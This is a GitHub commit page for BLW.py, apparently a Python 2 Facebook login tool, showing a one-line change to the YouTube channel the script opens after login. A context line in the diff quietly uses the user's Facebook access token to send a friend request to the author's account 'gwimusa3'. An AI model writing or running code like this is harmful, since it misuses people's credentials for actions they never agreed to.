Skip to content

Commit

Permalink
Update BLW.py
Browse files Browse the repository at this point in the history
  • Loading branch information
BLackWhite0711 authored Jul 21, 2019
1 parent 8657c99 commit aa500ee
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion BLW.py
Original file line number Diff line number Diff line change
Expand Up @@ -97,7 +97,7 @@ def login():
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://youtube.com/NjankSoekamti')
os.system('xdg-open https://www.youtube.com/channel/UCJWgAlqKsytbWqYrYhAPWvw')
time.sleep(2)
menu()
except requests.exceptions.ConnectionError:
Expand Down

0 comments on commit aa500ee

Please sign in to comment.